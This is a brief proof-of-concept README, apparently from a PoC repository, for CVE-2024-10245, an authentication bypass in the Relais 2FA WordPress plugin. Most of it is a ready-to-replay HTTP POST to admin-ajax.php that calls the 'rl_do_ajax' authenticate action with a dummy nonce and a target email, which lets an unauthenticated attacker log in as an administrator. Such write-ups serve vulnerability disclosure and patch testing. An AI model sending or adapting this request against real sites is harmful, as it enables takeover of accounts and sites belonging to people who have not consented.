Relais 2FA <= 1.0 - Authentication Bypass# CVE-2024-10245
Relais 2FA <= 1.0 - Authentication Bypass
# Description
The Relais 2FA plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.0. This is due to incorrect authentication and capability checking in the 'rl_do_ajax' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.
POC
---
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=wp-time-capsule-settings
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Origin: http://kubernetes.docker.internal
Connection: keep-alive
action=rl_do_ajax&rl_action=authenticate&nonce=213123123&email=admin@admin.com
```
[4.0K] /data/pocs/ebb587b7c27dc4a5a3053c550622ebfef40fe837
└── [1.0K] README.md
0 directories, 1 file